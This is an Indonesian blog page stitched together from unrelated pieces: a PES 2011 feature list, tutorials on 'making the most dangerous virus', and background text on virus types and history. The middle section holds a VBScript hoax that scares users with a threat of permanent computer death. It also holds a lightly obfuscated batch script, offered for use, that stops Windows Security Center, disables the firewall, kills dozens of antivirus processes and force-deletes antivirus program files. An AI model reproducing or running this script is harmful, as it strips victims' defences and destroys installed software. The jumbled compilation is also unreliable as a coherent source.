Menurut produser Konami Shingo Takatsuka, ide yang tak bisa diimplementasikan untuk PES 2011 pun bisa disimpan untuk seri PES lain di masa depan.
Game 2011
Game PES 2011
Fitur-fitur Terbaru PES 2011
1. Sistem kendali
Pengendalian pemain terhadap karakternya kian ditingkatkan. Kini gamer dapat mengendalikan seluruh gerakan seperti menendang, menggiring bola, mengocek lawan dengan sangat presisi. Tentunya sistem gerakan tersebut masih bisa disesuaikan kembali.
2. Pengukur stamina
Pengukur stamina yang berbentuk ‘tingkatan’ kini lebih detail. Terlalu sering berlari dan mengiring bola pun akan menurunkan stamina para pemain dalam PES 2011.
3. Pertahanan yang lebih baik
Para pemain belakang kini punya gaya pertahanan lebih baik dengan gerakan yang begitu alami. Kini mereka tidak hanya mengejar bola yang masuk dalam areanya, namun juga berupaya merebut bola tanpa melakukan kesalahan.
4. Animasi beragam
Dalam PES 2011 Konami telah merombak total animasi yang akan dikeluarkan tiap-tiap pemain. Semua gerakan kini terlihat lebih terlihat nyata, terlebih lagi Konami membenamkan Physics dalam PES kali ini.
5. Pengaturan kecepatan bermain
Dengan sebuah kontrol terbaru di dalamnya, gamer bisa mengatur sendiri seberapa cepat ia akan bermain.
6. Estetika
Wajah para pemain kini telah banyak diperbaharui dari PES 2010. Konami kini telah menyertakan sedikitnya seribu animasi baru berdasarkan gerakan nyata yang telah direkam selama kurang lebih 100 jam.
7. Taktik dan Strategi
Mekanisme pengaturan taktik dan strategi dalam PES 2011 bersifat ‘Drag & Drop’. Tidak hanya sebatas pengaturan subtitusi dan perubahan pemain, pengaturan ini juga akan diberikan animasi singkat mengenai potensi strategi yang akan digunakannya.
8. Liga online
Untuk pertama kalinya dalam seri PES, Konami memberikan fitur Master League yang bisa dimainkan secara online.
9. Dukungan 3D
PES 2011 juga telah mengusung teknologi 3D yang akan membuat game ini serasa ‘hidup’. Gunakan kacamata khusus, maka gamer akan mendapati tampilan 3 dimensi layaknya pada film layar lebar.

MEMBUAT VIRUZ PALING BERBAHAYA

Informasi Teknologi Tutorial Membuat Virus Paling Berbahaya
Virus ? Mungkin kalau ada kata satu ini pasti disitulah ada yang namanya masalah. Teruatama pada komputer, kata tersebutsalalu berhubungan dengan yang namanya anti dan progammer handal. Namun, untuk memebuat virus anda tidak harus menjadi progammer yang telah mengerti 100% atau hampirlah semua. Yang anda butuhkan hanya “sedikit” ilmu tapi anda lebih kreatif.
Membuat virus sama halnya dengan jika anda ingin disebut sebagai hacker atau menjadi hacker anda harus memiliki ilmu meski “sedikit” yang penting bagaimana anda kreatif dalam memadukan ilmu yang anda dapat dengan keinginan anda.
Baiklah, sekarang kita kembali ke sasaran uatama yaitu membuat virus. Kali ini saya tidak akan memberikan “pelajaran” tentang bahasa pemrogrman tetapi saya akan memberitahu anda bagaimana cara MUDAHNYA membuat VIRUS.
Saya tidak memakai bahasa pemrograman dalam hal pembuatan virus ini. Yang anda butuhkan hanyalah sebuah aplikasi atau program atau software yang sering disebut dengan virus maker.
Berikut virus maker dan removal tool-nya yang bisa anda gunakan untuk membuat virus dengan cara mudah(paling cuama butuh waktu sekitar 10 menitan) :
program kecil yang bisa digunakan membuat virus menggunakan bahasa VB

Program kecil untuk iseng-iseng kerjaiin temen silahkan coba sendiri
program cara gampang membuat virus
Program kecil untuk mengembalikan regedit atau file yang terinfeksi virus
program yang satu ini berguna bagi yang pengen membuat antivirus sendiri
Kemudian ada lagi ni cara jitu membuat virus
SUMPAH KALAU MASIH KERING2 N MAU NYOBA2 JGN PAKAI INI YAA..... 
W G TANGGUNG..... U COPY PASTE AJA NI TUTORIAL DAH ADA VIRUZZ..
sumber : http://anggabhandel009.blogspot.com

belajar membuat virus bohongan yang berpasswords menggunakan notepad



Dim code
Dim pass
pass = "www.gudangcara.co.cc"
MsgBox "Maaf, saat ini komputer anda telah terinfeksi virus, segera anda kunjungi www.gudangcara.co.cc untuk medapatkan password penjinak virusnya. Jika dalam jangka waktu 5 menit anda belum mendapatkan passwordnya maka komputer anda akan mati untuk selamanya.  Waktu 5menit anda dimulai: " & Time, 16, "Gudang Virus"
Do
code = InputBox("Masukkan password untuk menggagalkan virus ini.", "Virus  Removal")
If code<>pass Then
MsgBox "Kode" & code & " Password yang anda masukan salah, segera kunjungi www.gudangcara.co.cc untuk mendapatkan passwordnya "

End If
Loop Until code=pass
MsgBox "Password diterima, Komputer anda telah aman dari virus. Selamat!



 Untuk kode yang berwarna merah anda bisa ganti dengan password virus yang anda inginkan, sedangkan untuk kode yang berwarna biru anda ganti dengan kata-kata atau pesan yang akan tampil pada password yang akan anda buat.
Jika sudah anda selesai, simpan script yang telah anda copy di atas dengan extensi *.vbs misalnya anda membuat namanya gudangvirus.vbs, dan jangan lupa anda rubah tipenya dari txt menjadi All Files.
Perlu saya beritahu bahwa virus ini tidak akan merusak sedikitpun data-data yang ada di komuter anda, jadi anda tidak perlu khawatir jika ingin mencoba virus ini di komputer anda, namanya saja virus bohongan, jadi ya ga ada efeknya sedikitpun. Ini hanya digunakan untuk pembelajaran, dan anda bisa berkreasi untuk mengedit script di atas.
Jika anda ingin menggunakan script ini untuk berbuat kejahilan silahkan tapi saya ingatkan jika saya tidak mau tahu dan tidak akan bertanggung jawab atas semua akibat yang ditimbulkan atas kejahilan yang dibuat virus ini, jadi sebaiknya gunakan virus ini hanya sebagai pembelajaran saja. Males copas ya, kalo gitu download aja kodenya DISINI.
Semoga bermanfaat dan selamat mencoba.

Saya harap para rekan blogger bisa lebih arif dan bijaksana dalam menentukan keputusan perlu atau tidaknya memasang kode script diatas, kalau sama-sama kita simak lirik lagu mbah Gesang yang berjudul Bengawan Solo sbb : " air mengalir sampai jauh, akhirnya ke laut" .Kalau boleh saya artikan sendiri "air" itu ibarat "Ilmu" dan "laut" itu seperti "kehidupan" jadi biarkanlah ilmu itu mengalir dari satu orang ke orang lain, toh akhirnya bermuara didalam kehidupan kita, hehehe...sok berfilosofi gue wkwkwkwkw.....lebay mode:on. Berbagi ilmu itu ibadah lho...
 sumber : http://anggabhandel009.blogspot.com

trick buat Virus yang menhancurkan antivirus

example :





just share ,.. segala resiko di tanggung sendiri , kali ini saya hendak membagi tehnik membuat virus yang mematikan antivirus..

ok langsung aee

langkah pertama bikin fungsinya dulu
Code:
set fun=net
set morefun=stop
set math=tsk
set ias=ill
set zee3vil=del
set beer=/a
selanjutnya kita matikan firewall hehhe
Code:
%fun% %morefun% “Security Center”
%fun%sh firewall set opmode mode=disable
berikutnya task killer nya ..
code
%math%%ias% %beer% E-*
%math%%ias% %beer% av*
%math%%ias% %beer% fire*
%math%%ias% %beer% anti*
%math%%ias% %beer% spy*
%math%%ias% %beer% bullguard
%math%%ias% %beer% PersFw
%math%%ias% %beer% KAV*
%math%%ias% %beer% ZONEALARM
%math%%ias% %beer% SAFEWEB
%math%%ias% %beer% OUTPOST
%math%%ias% %beer% nv*
%math%%ias% %beer% nav*
%math%%ias% %beer% F-*
%math%%ias% %beer% ESAFE
%math%%ias% %beer% cle
%math%%ias% %beer% BLACKICE
%math%%ias% %beer% def*
%math%%ias% %beer% kav
%math%%ias% %beer% kav*
%math%%ias% %beer% avg*
%math%%ias% %beer% ash*
%math%%ias% %beer% aswupdsv
%math%%ias% %beer% ewid*
%math%%ias% %beer% guard*
%math%%ias% %beer% guar*
%math%%ias% %beer% gcasDt*
%math%%ias% %beer% msmp*
%math%%ias% %beer% mcafe*
%math%%ias% %beer% mghtml
%math%%ias% %beer% msiexec
%math%%ias% %beer% outpost
%math%%ias% %beer% isafe
%math%%ias% %beer% zap*
%math%%ias% %beer% zauinst
%math%%ias% %beer% upd*
%math%%ias% %beer% zlclien*
%math%%ias% %beer% minilog
%math%%ias% %beer% cc*
%math%%ias% %beer% norton*
%math%%ias% %beer% norton au*
%math%%ias% %beer% ccc*
%math%%ias% %beer% npfmn*
%math%%ias% %beer% loge*
%math%%ias% %beer% nisum*
%math%%ias% %beer% issvc
%math%%ias% %beer% tmp*
%math%%ias% %beer% tmn*
%math%%ias% %beer% pcc*
%math%%ias% %beer% cpd*
%math%%ias% %beer% pop*
%math%%ias% %beer% pav*
%math%%ias% %beer% padmin
%math%%ias% %beer% panda*
%math%%ias% %beer% avsch*
%math%%ias% %beer% sche*
%math%%ias% %beer% syman*
%math%%ias% %beer% virus*
%math%%ias% %beer% realm*
%math%%ias% %beer% sweep*
%math%%ias% %beer% scan*
%math%%ias% %beer% ad-*
%math%%ias% %beer% safe*
%math%%ias% %beer% avas*
%math%%ias% %beer% norm*
%math%%ias% %beer% offg*
final.. hancurkan semua antivirus ( ini bisa anda kembangkan )
code
%r4z0r% /Q /F %ProgramFiles%alwils~1avast4*.*
%zee3vil% /Q /F %ProgramFiles%LavasoftAd-awa~1*.exe
%zee3vil% /Q /F %ProgramFiles%kasper~1*.exe
%zee3vil% /Q /F %ProgramFiles%trojan~1*.exe
%zee3vil% /Q /F %ProgramFiles%f-prot95*.*
%zee3vil% /Q /F %ProgramFiles%tbav*.dat
%zee3vil% /Q /F %ProgramFiles%avpersonal*.*
%zee3vil% /Q /F %ProgramFiles%Norton~1*.*
%zee3vil% /Q /F %ProgramFiles%Mcafee*.*
%zee3vil% /Q /F %ProgramFiles%Norton~1Norton~1Norton~3*.*
%zee3vil% /Q /F %ProgramFiles%Norton~1Norton~1speedd~1*.*
%zee3vil% /Q /F %ProgramFiles%Norton~1Norton~1*.*
%zee3vil% /Q /F %ProgramFiles%Norton~1*.*
%zee3vil% /Q /F %ProgramFiles%avgamsr*.exe
%zee3vil% /Q /F %ProgramFiles%avgamsvr*.exe
%zee3vil% /Q /F %ProgramFiles%avgemc*.exe
%zee3vil% /Q /F %ProgramFiles%avgcc*.exe
%zee3vil% /Q /F %ProgramFiles%avgupsvc*.exe
%zee3vil% /Q /F %ProgramFiles%grisoft
%zee3vil% /Q /F %ProgramFiles%nood32krn*.exe
%zee3vil% /Q /F %ProgramFiles%nood32*.exe
%zee3vil% /Q /F %ProgramFiles%nod32*.exe
%zee3vil% /Q /F %ProgramFiles%nood32*.exe
%zee3vil% /Q /F %ProgramFiles%kav*.exe
%zee3vil% /Q /F %ProgramFiles%kavmm*.exe
%zee3vil% /Q /F %ProgramFiles%kaspersky*.*
%zee3vil% /Q /F %ProgramFiles%ewidoctrl*.exe
%zee3vil% /Q /F %ProgramFiles%guard*.exe
%zee3vil% /Q /F %ProgramFiles%ewido*.exe
%zee3vil% /Q /F %ProgramFiles%pavprsrv*.exe
%zee3vil% /Q /F %ProgramFiles%pavprot*.exe
%zee3vil% /Q /F %ProgramFiles%avengine*.exe
%zee3vil% /Q /F %ProgramFiles%apvxdwin*.exe
%zee3vil% /Q /F %ProgramFiles%webproxy*.exe
%zee3vil% /Q /F %ProgramFiles%panda software*.*
Masukan dgn extensi EXE ATAU BAT  JUGA BSA
LEWAT NOTEPAD
JIKA TERJADI KERUSAKAN ATAU BLANK PADA PC ANDA INI BUKAN TANGGUNG JAWAB KAMI!!!!!!
TERIMAKASIH
sumber: http://anggabhandel009.blogspot.com

asal pertama kali virus komputer di ciptakan


worm_virus.jpg
Pengklasifikasian Virus Komputer

Pengelompokan virus komputer atau klasifikasinya sebenarnya banyak, tergantung dari sudut mana kita melihatnya, antara lain klasifikasi umum, klasifikasi cara penularan atau penyebarannya, klasifikasi menurut tehnik pemprogramannya, dan klasifikasi mengenai rtin-rutin yang dikerjakan oleh Virus Komputer tersebut.
Klasifikasi Virus Komputer Secara Umum
Pengklasifikasian Virus Komputer sebenarnya tidak begitu jelas, tergantung dari programer virus itu sendiri, tapi secara garis besar / pada umumnya virus komputer itu dibedakan memjadi 3 yaitu :
1. Virus Boot Sector
Virus Boot Sector merupakan virus yg memanfaatkan gerbang hubungan antara komputer dam media penyimpanan, sebagai tempat penyebarannya. Pada suatu disket boot sector merupakan gerbang penghubung antara komputer dengan media penyimpanan, pada boot sector ini biasanya diletakan System Operasi yang berfungsi sebagai pengatur antara komputer dengan user, apabila pada boot sector terdapat suatu program yang mampu menyebarkan diri dan mampu tinggal di memory maka program tersebut dapat disebut virus. Begitu juga pada partisi hard disk, dengan demikian virus boot sector dapat dibedakan menjadi 2 jenis virus yaitu Virus Komputer yang menyerang disket dan Virus Komputer yang menyerang partisi dan disket, yang umumnya disebut virus MBR (Master Boot Record). Pekerjaan pokok yang harus dilakukan virus boot sector secara umum mencakup 3 hal yaitu :
1. Virus harus menyimpan boot sector atau partisi asli ke suatu tempat pada disket atau hardisk dan mengganti data-data pada boot sector dengan program virus itu sendiri, yang kemudian setelah virus boot sector itu dijalankan baru dia akan memanggil data-data boot sector asli atau data-data system.
2. Virus harus tinggal di memory setelah system berjalan dan akan memperbanyak dirinya pada setiap kondisi tertentu, kondisi ini biasanya kalau ada proses baca atau tulis pada disket
3. Virus umumnya mempunyai Routine / tugas khusus yang disertakan oleh pembuatnya seperti menampilkan kata-kata, gambar atau juga logic Bom seperti melakukan pemformatan terhadap Hard Disk pada tanggal tertentu dan lain sebagainya.
Contohnya virus Stoned , yang akan menampilkan kalimat
Your PC is Stoned
Legalize MARIJUANA
Yang disertai dengan bunyi Bell Pada setiap kali dilakukan booting dari disket yang tertular Virus Stoned ini.juga menyerang tabel partisi Hard Disk dengan meletakan partisi asli pada track 0, side 0, sector 7, atau pada disket meletakan BootRecord asli pada Root Directory terakhir dalam disket, virus ini adalalah virus Boot sector yang sudah cukup tua, yang masih banyak beredar dikalangan pemakai komputer.
2 . Virus File
Virus file adalah virus yang paling banyak versi dan jenisnya sehingga banyak klasifikasi untuk Virus Komputer ini. Dalam penyebarannya virus ini memanfaatkan file-file exekusi yang dapat diproses langsung dalam dos command line, seperti file-file COM, File EXE, File BAT, selain itu virus file juga dapat menyerang file-file SYS, dan beberapa file Overlay, pada tehnologi baru pembuatan Virus Komputer, virus-Virus Komputer ini juga dapat menyerang file Document dalam Windows dengan extensi DOC, yang biasa disebut Virus Macro, selain itu virus-virus file baru banyak yang diprogram dibawah sistem operasi windows, dan sudah tidak menggunakan Low Level Language (Assembly), melainkan dengan High Level Language (HLL). Virus Komputer ini biasa ditulis dengan Visual Basic, Java Script, VB Script, Visual C++ dan lain sebagainya. Biasanya virus yang diprogram dengan HLL ini dapat disebarkan melalui Internet dalam bentuk E-mail Attachment, Virus Komputer jenis ini lebih luas dan lebih cepat perkembangannya di bandingkan virus file yang beroperasi dalam lingkungan DOS
3. Virus Hybrid
Virus Komputer jenis ini disebut juga Virus Komputer automodifikasi yang mempunyai dua kemampuan sekaligus, diantaranya mempunyai kemampuan untuk menyerang atau menginfeksi Boot record, juga dapat menginfeksi file-file dalam disket. Virus-virus ini biasanya mempunyai kemampuan untuk bersembunyi yang lebih baik dari pada virus boot record atau pun virus file. Dan biasanya Virus Komputer jenis Hybrid ini lebih susah untuk dibasmi, karena dalam pembasmiannya harus digunakan dua metode pencarian dan pembasmian, yaitu pencarian dan pembasmian virus pada Boot sector juga pencarian dan pembasmian pada file-file yang terinfeksi.
Klasifikasi Menurut Cara Penularan Atau Penyebaran
Menurut cara penularan atau penyebarannya virus dibagi menjadi 3 bagian umum yaitu
1. Appending ( Menempel )
Virus jenis ini dalam penularannya akan menempelkan dirinya pada file korban biasanya pada akhir file. Pada virus ini bagian awal dari file akan dirubah menunjuk pada bagian badan virus. Langkah langkah Penularannya sebagai berikut :
V1
V2
P1
P2
V1
P1
P2
V2
Ket :
V1 = Header Virus
P1 = Header Program
V2 = Badan Virus P2 = Badan Program
Gambar Logika Virus Appending
Dimana V1 Biasanya berisi Perintah JMP Ke alamat Badan Virus, V2 Adalah Badan Virus Yang mempunyai prosedur / rutin-rutin penularan runtin penyembuhan program asli, maupun rutin-rutin manipulasi, sedangkan P1 adalah Header Program yang pada file COM berisi Instruksi JMP, sedangkan pada file EXE berisi Extension file atau keterangan mengenai file tersebut. Sedangkan P2 adalah badan program asli. Disana bisa dilihat kalau program tersebut akan bertambah panjang dikarenakan virus menambahkan panjang dirinya kedalam file-tersebut yaitu :
Panjang Program = Program asli + Kode Virus
Panjang Program = V1 + P1 + P2 + V2
2. Overwriting (Menimpa)
Virus jenis ini biasanya lebih sederhana dari virus dengan tehnik Appending, karena dia hanya menimpa bagian pertama program dengan kode virus sendiri, sehingga file yang sudah terkena virus ini sudah pasti rusak dan tidak dapat dipakai lagi, dan untuk penyembuhan terhadap file yang terinfeksi virus jenis ini tidak bisa dilakukan, karena data awal program tersebut, yaitu sepanjang kode virus hilang, digantikan oleh kode virus , dan sewaktu program dijalankan sebenarnya hanya program virusnya yang jalan, sedangkan program aslinya sendiri tidak akan jalan.
Dibawah ini contoh logika dari Virus yang OverWriting target File
V1
V2
Virus
P1
P2
Program asli
V1
V2
P2
Setelah terinfeksi
Gambar Logika Virus OverWriting
Diatas dapat kita lihat bahwa Panjang dari program tidak akan berubah dikarenakan virus hanya menimpa bagian awal dari program sepanjang kode virus itu sendiri, dimana Panjang Program terinfeksi = Panjang program asli – Panjang Kode Virus
3. Spawning / Companion
Cara kerja virus ini lain dari pada virus Appending dan virus Overwriting, dikarenakan virus ini tidak menulari file targetnya, dan file ini hanya berlaku untuk file target dengan Extension EXE, cara kerja virus ini adalah dengan cara membuat sebuah file baru dengan nama sama dengan file korban, hanya dengan Extension COM, karena dalam sistim operasi MS-DOS apabila ada dua file dengan nama yang sama dan extension yang berbeda satu EXE dan File Satunya COM, maka yang akan dijalankan terlebih dahulu adalah file dengan extension COM, sehingga virus ini menciptakan suatu file COM dalam direktory, yang biasanya menggunakan attribute Hidden / Tersembunyi, sehingga tidak terlihat oleh User., dan umumnya Virus Komputer jenis ini menggunakan tehnik TSR (Terminate And Stay Resident ), atau menetap dalam memori dan melakukan pengecekan terhadap file yang dieksekusi atau file yang dijalankan. Apabila yang dijankan ternyata file EXE maka virus ini akan menulis sebuah file baru dengan nama yang sama dengan file yang dijalankan, namun dengan extensionnya COM, yang berisi kode virus itu sendiri, sehingga sewaktu user menjalankan program EXE nya, maka yang dijankan adalah program virus itu sendiri, setelah virus dijalankan dia akan menetap dimemori Terminate and Stay Resident ( TSR ), dan akan memantau setiap file yang dijalankan, untuk mengecek apakah yang dijalankan file EXE atau bukan.
Pada Virus ini dapat diletakkan rutin rutin khusus yang akan dilakukan oleh virus tersebut, sebagai contohnya virus PERKASA yang dibuat oleh salah seorang mahasiswa Gunadarma yang akan menampilkan tulisan dan kotak persegi yang dibuat dalam bentuk grafik apabila setiap file-file bervirus dijalankan, setelah menampilkan tulisan maka program aslinya yang akan berjalan, dan virus PERKASA tersebut sudah menetap di memory, memantau setiap file yang dijalankan, dan apabila file yang dijalankan adalah program antivirus maka virus PERKASA Ini akan menghapus program antivirus tersebut, disertai dengan tampilan animasi yang berbentuk pagar besi yang menjepit di tengah layar.
Klasifikasi Menurut Rutin Aktivasi
Berdasarkan rutin-rutinnya Virus Komputer dapat dibedakan menjadi 3 kelompok besar, yang dimasukan ke dalam kategori tingkat bahaya / keganasan dari virus yaitu virus jinak, ganas, dan virus destruktif, yang didalamnya masing-masing dibagi lagi menjadi beberapa bagian yaitu :
1. Virus Jinak
Virus dengan rutin / tugas yang dibebankan kepadanya tidak melakuan aksi-aksi destruktif, maka akan disebut virus junak, biasannya virus jenis ini melakukan hal-hal seperti dibawah ini :
1. Rutin untuk menampilkan gambar atau tulisan kelayar
2. Rutin untuk membunyikan port untuk speaker dengan nada-nada tertentu, seperti irama lagu ( Virus Mozzart ), tembakan ( VCL Based Virus ).
3. Rutin untuk mempause / menghentikan komputer setelah beberapa jam komputer yang terinfeksi dipakai.Contohnya Virus Ambulance
4. Rutin untuk mengurangi Ram (memori), sehingga komputer berjalan lebih lambat, yaitu walaupun memakai Prosesor P.II 233 Mhz akan seperti Proc. 486
5. Rutin untuk merestart komputer pada waktu-waktu tertentu (NRLG Based Virus)
6. Rutin untuk mengacaukan keyboard, seperti mengacaukan letak huruf pada keyboard (Virus KeyPress), atau memindahkan susunan tombol kyboard 1 tombol disebelahnya (Virus Typo COM)
2. Virus Ganas
Yang termasuk dari jenis virus ini adalah virus-virus yang mempunyai aksi-aksi yang merugikan, dan biasanya kerugian yang diakibatkan oleh jenis virus ini tidak dapat dipulihkan. Yang termasuk rutin / aksi yang merugikan atau berbahaya dari virus ini adalah :
1. Rutin untuk menghapus file, atau seluruh file dalam disket maka data pada disket tersebut akan hilang, contoh dari virus ini BLODY Virus.
2. Rutin untuk memformat hard disk, maka otomatis data yang ada pada hard disk juga akan ikut hilang, contoh dari virus ini adalah virus AIDS II
3. Overwriting file target, rutin ini akan merusak program yang ditulari, sehingga program tidak dapat dipakai lagi, sebagai contoh dari virus ini adalah VOOTIE.B.66 virus, yang akan meng-overwrite permulaan file targetnya sebanyak panjang badan virus, yaitu 66 Bytes.
4. Rutin untuk Mengacaukan kerja printer, yang akan merusak dokumen yang akan dicetak atau diprint, contohnya virus SUPERNOVA.
5. Rutin untuk membebani Server atau attachment E-Mail, rutin ini biasanya digunakan oleh virus yang bekerja dibawah file operasi Windows, atau unix , sebagai contoh virus Melissa & virus Prilissa.
Dan juga virus-virus yang mempunyai kombinasi dari rutin-rutin yang berbahaya seperti diatas.
3. Virus Destruktif
Virus Komputer jenis destruktif Ini yang biasanya paling ditakuti orang, karena daya rusaknya yang besar dan juga dapat menghancurkan sofware maupun hardware, sehingga kerugian yang diakibatkan oleh Virus Komputer jenis ini sangat besar, karena mereka banyak melakukan perusakan terhadap hardware, contoh rutin yang termasuk kategori destruktif antara lain:
1. Rutin penghancuran FAT dan atau Directory pada hard disk , dengan cara melakukan pemformatan pada track 2, sector 0, sampai track 3 sector 1 pada side 0 sehingga harddisk tidak akan bisa dipakai, atau membuat Bad Sector Pada side 0, tarck 0, sector 0 (Pada boot record), sehingga harddisk tidak dapat diformat. Contoh dari virus ini adalah DEVIL DANCE Virus.
2. Rutin menghancurkan BIOS, sehingga komputer tidak mengenali lagi peripherial yang dipasang pada komputer tersebut, sehingga akan merusak hard disk, Main board, contoh virus ini adalah virus CIH yang dibuat oleh Cheng Ing Hau.
3. Virus A Virtual Card for You (masih dalam penelitian penulis)
Diantara ketiga jenis virus menurut rutin aktivasinya yang merupakan virus dalam kategori Destruktif, hanya sekitar 5 persen dari seluruh jumlah virus yang ada
Virus jinak jauh lebih banyak (72.6 %), daripada virus ganas (19,6 %) atau destruktif (7,8 %) mungkin dikarenakan adanya kode etik dari para pembuat virus untuk tidak membuat virus yang sifatnya merusak, karena apabila ciptaannya merugikan orang lain maka orang akan mencap Negative pada para pembuat virus. Dan juga pada umumnya virus dengan aksi Destruktif atau merusak akan cepat diketahui kehadirannya dan lebih mudah dibasmi, karena mereka meninggalkan jejak yang cukup jelas, akibat aksi pengrusakkannya., sedangkan untuk Virus Komputer yang tidak merusak, walaupun mereka cukup megganggu tapi lebih susah untuk diketahui kehadirannya, karena pada umumnya Virus Komputer sekarang ini lebih canggih dan lebih rumit dari Virus Komputer terdahulu, dikarenakan Virus Komputer masa kini telah menerapkan tehnik encryption, mutation engine, maupun Polymorpic engine, yang menjadi standard pembuatan Virus Komputer masa kini, walaupun pemrogram virus komputer yang masih baru dan belum berpengalaman, dapat membuat virus yang sangat canggih, dikarenakan banyak program-program bantu yang dapat membuat virus DOS sederhana menjadi sangat canggih dan tidak dapat dideteksi oleh Scaner AntiVirus. Contohnya Program CrptCom yang akan membuat Virus sederhana menjadi Ter-Enkripsi menggunakan metode XOR, atau TPE (Trident Polymorphic Engine) yaitu suatu program yang akan menghasilkan virus-virus yang dapat bermutasi menghasilkan varian baru, dan dalam setiap infeksi akan merubah rutin enkripsinya, dan akan sulit untuk di deteksi oleh AntiVirus biasa.
DAN SELENGKAPNYA DA DI ARTIKEL DI BAWAH INI

History Of VIRUS

We often experience excessive fear with a computer virus caused by ignorance / blindness knowledge of the computer virus itself, we can eliminate these fears more familiar with computer viruses. For that let us see more of a computer virus ……
ASAL MUASAL VIRUS
Virus komputer pertama kalinya tercipta bersamaan dengan komputer. Pada tahun 1949, salah seorang pencipta komputer, John von Newman, yang menciptakan Electronic Discrete Variable Automatic Computer (EDVAC),memaparkan suatu makalahnya yang berjudul “Theory and Organization of Complicated Automata”. Dalam makalahnya dibahas kemungkinan program yang dapat menyebar dengan sendirinya. Perkembangan virus komputer selanjutnya terjadi di AT&T Bell Laboratory salah satu laboratorium komputer terbesar didunia yang telah menghasilkan banyak hal, seperti bahasa C dan C++.1 Di laboratorium ini, sekitar tahun 1960-an, setiap waktu istirahat para peneliti membuat permainan dengan suatu program yang dapat memusnahkan kemampuan membetulkan dirinya dan balik menyerang kedudukan lawan. Selain itu, program permainan dapat memperbanyak dirinya secara otomatis. Perang program ini disebut Core War, yaitu pemenangnya adalah pemilik program sisa terbanyak dalam selang waktu tertentu. Karena sadar akan bahaya program tersebut, terutama bila bocor keluar laboratorium tersebut, maka setiap selesai permainan, program tersebut selalu dimusnahkan. Sekitar tahun 1970-an ,perusahaan Xerox memperkenalkan suatu program yang digunakan untuk membantu kelancaran kerja. Struktur programnya menyerupai virus, namun program ini adalah untuk memanfaatkan waktu semaksimal mungkin dan pada waktu yang bersamaan dua tugas dapat dilakukan. Pada tahun 1980-an, perang virus di dunia terbuka bermula atas pemaparan Fred Cohen, seorang peneliti dan asisten profesor di Universitas Cincinati, Ohio. Dalam pemaparannya, Fred juga mendemonstrasikan sebuah program ciptaannya, yaitu suatu virus yang dapat menyebar secara cepat pada sejumlah komputer. Sementara virus berkembang, Indonesia juga mulai terkena wabah virus. Virus komputer ini pertama menyebar di Indonesia juga pada tahun 1988. Virus yang begitu menggemparkan seluruh pemakai komputer di Indonesia, saat itu, adalah virus ©Brain yang dikenal dengan nama virus Pakistan.
PENGERTIAN VIRUS “A program that can infect other programs by modifying them to include a slighty altered copy of itself. A virus can spread throughout a computer system or network using the authorization of every user using it to infect their programs. Every programs that gets infected can also act as a virus that infection grows“ ( Fred Cohen ) Pertama kali istilah “virus” digunakan oleh Fred Cohen pada tahun 1984 di Amerika Serikat. Virus komputer dinamakan “virus” karena memiliki beberapa persamaan mendasar dengan virus pada istilah kedokteran (biological viruses). Virus komputer bisa diartikan sebagai suatu program komputer biasa. Tetapi memiliki perbedaan yang mendasar dengan program-program lainnya,yaitu virus dibuat untuk menulari program-program lainnya, mengubah, memanipulasinya bahkan sampai merusaknya. Ada yang perlu dicatat disini, virus hanya akan menulari apabila program pemicu atau program yang telah terinfeksi tadi dieksekusi. Virus yang terdapat pada komputer hanyalah berupa program biasa, sebagaimana layaknya program-program lain. Tetapi terdapat perbedaan yang sangat mendasar pada virus komputer dan program lainnya.
KRITERIA VIRUS
Suatu program dapat disebut sebagai suatu virus apabila memenuhi minimal 5 kriteria berikut : 1. Kemampuan untuk mendapatkan informasi 2. Kemampuan untuk memeriksa suatu program 3. Kemampuan untuk menggandakan diri dan menularkan diri 4. Kemampuan melakukan manipulasi 5. Kemampuan untuk menyembunyikan diri. Sekarang akan coba dijelaskan dengan singkat apa yang dimaksud dari tiap-tiap kemampuan itu dan mengapa ini sangat diperlukan :
Kemampuan untuk mendapatkan informasi
Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam suatu directory. Untuk apa? Agar dia dapat memperoleh daftar file yang bisa dia tulari. Misalnya, virus makro yang akan menginfeksi semua file data MS Word, akan mencari daftar file berekstensi *.doc. Disinilah kemampuan mengumpulkan informasi itu diperlukan agar virus dapat membuat daftar/data semua file, lalu memilahnya dengan mencari file-file yang bisa ditulari. Biasanya data ini tercipta saat file yang tertular/terinfeksi virus atau file program virus itu sendiri dibuka oleh user. Sang virus akan segera melakukan pengumpulan data dan menaruhnya (biasanya) di RAM, sehingga apabila komputer dimatikan semua data hilang. Tetapi data-data ini akan tercipta kembali setiap kali virus itu diaktifkan. Biasanya data-data ini disimpan juga sebagai hidden file oleh virus tersebut.
Kemampuan memeriksa suatu program Suatu virus juga harus bisa memeriksa suatu file yang akan ditulari, misalnya dia bertugas menulari program berekstensi *.doc, maka dia harus memeriksa apakah file dokumen tersebut telah terinfeksi ataupun belum, karena jika sudah, akan percuma menularinya lagi. Ini sangat berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan menginfeksi suatu file/program. Yang umum dilakukan oleh virus adalah memiliki/memberi tanda pada file/program yang telah terinfeksi sehingga mudah untuk dikenali oleh virus tersebut. Contoh penandaan adalah misalnya memberikan suatu byte yang unik di setiap file yang telah terinfeksi.
Kemampuan untuk menggandakan diri Kalo ini memang virus “banget”, maksudnya, tanpa kemampuan ini tak adalah virus. Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari file lainnya. Suatu virus apabila telah menemukan calon korbannya maka ia akan mengenalinya dengan memeriksanya. Jika belum terinfeksi maka sang virus akan memulai aksinya penularan dengan cara menuliskan byte pengenal pada file tersebut, dan seterusnya mengcopikan/menulis kode objek virus diatas file sasaran. Beberapa cara umum yang dilakukan oleh virus untuk menulari/menggandakan dirinya adalah :
a. OverWriting Virus / Menimpa Target Virus jenis ini akan merusak file yang ditulari, biasanya virus ini dibuat oleh programer virus yang kurang berpengalaman. karena dia akan menimpa program aslinya dengan program virus itu sendiri, sehingga program aslinya tidak dapat dijalankan.  program aslinya menjadi lebih pendek, dari sebelumnya, karena virus telah menimpa program tersebut, dan dapat dipastikan program asli tersebut tidak akan jalan,yang jalan hanya virusnya.
b. Appending Virus / Menempel Target Virus jenis ini merupakan virus tingkat lanjut, dan hanya programer virus tingkat menengah dan lanjut yang dapat memprogram virus jenis ini, karena tingkat kesulitannya lebih tinggi.virus jenis ini biasannya tidak merusak program yang ditulari, sehingga program yang sudah terinfeksi masih dapat dijalankan seperti biasa, dengan catatan tidak ada “BUG” di virus tersebut, sehingga lebih sulit menditeksi virus jenis ini, sehingga penyebarannya menjadi lebih cepat.
